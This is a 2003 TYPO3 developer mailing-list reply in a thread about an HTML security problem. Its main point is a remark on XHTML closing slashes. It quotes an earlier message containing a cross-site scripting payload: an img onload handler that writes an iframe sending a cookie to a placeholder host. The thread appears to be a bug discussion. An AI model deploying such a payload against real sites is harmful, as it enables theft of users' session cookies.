xhmtl (was: [Typo3-dev] Security Problem - HTML)

Martin Kutschker Martin.T.Kutschker at blackbox.net
Wed Sep 24 08:58:23 CEST 2003


From: "Robert Lemke" <rl at robertlemke.de>
Date: Tue, 23 Sep 2003 16:41:29 +0200

> <img src="http://hostname/typo3/gfx/helpbubble.gif" onload=
> "document.write('<iframesrc="\'http://hostname/test.php?cookie">');">
>
> I think it's because of TYPO3 trying to make the source code XHTML
> compliant, note how the IMG tag changed to img!

Folks, don't forget the "closing slash"! Every "standalone" tag (I don't remember the correct term right now) has to be "closed" with a slash before the right angle bracket (eg <img ... />, <br />, <hr />, etc).

Masi 





More information about the TYPO3-dev mailing list